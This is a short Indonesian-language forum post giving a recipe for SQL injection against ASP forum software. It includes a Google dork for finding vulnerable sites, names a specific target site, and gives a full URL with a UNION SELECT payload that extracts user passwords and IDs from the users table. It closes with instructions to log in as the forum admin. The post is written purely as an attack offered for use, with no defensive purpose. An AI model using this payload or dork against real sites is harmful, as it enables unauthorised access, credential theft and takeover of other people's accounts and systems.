Forum asp sql Vulnerablility

Pake trik SQL injection.

1.google dorknya : inurl:/forums.asp?iFor=

contohnya forum ini "ecreators.co.uk/" jadi google dorknya tambahin jadi "inurl:/forums.asp?iFor= ecreator"

2.kalau sudah dapat,ganti angka sesudah "=" dengan sql inject 

"12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,1 1,12+from+users"

jadi "http://www.ecreators.co.uk/csuk_asp_scripts/csuk_forum/forums.asp?iFor=12+union+select+1,2,3,u_password,5 ,u_id,7,8,9,10,11,12+from+users"

nahh, cari dah id admin dan liat juga passnya

3.login,dan sekarang anda admin di forum itu

hasil : http://www.ecreators.co.uk/csuk_asp_scripts/csuk_forum/messages.asp?iMsg=517&iFor=16

Hahaha ini adalah trik JADUL ^_^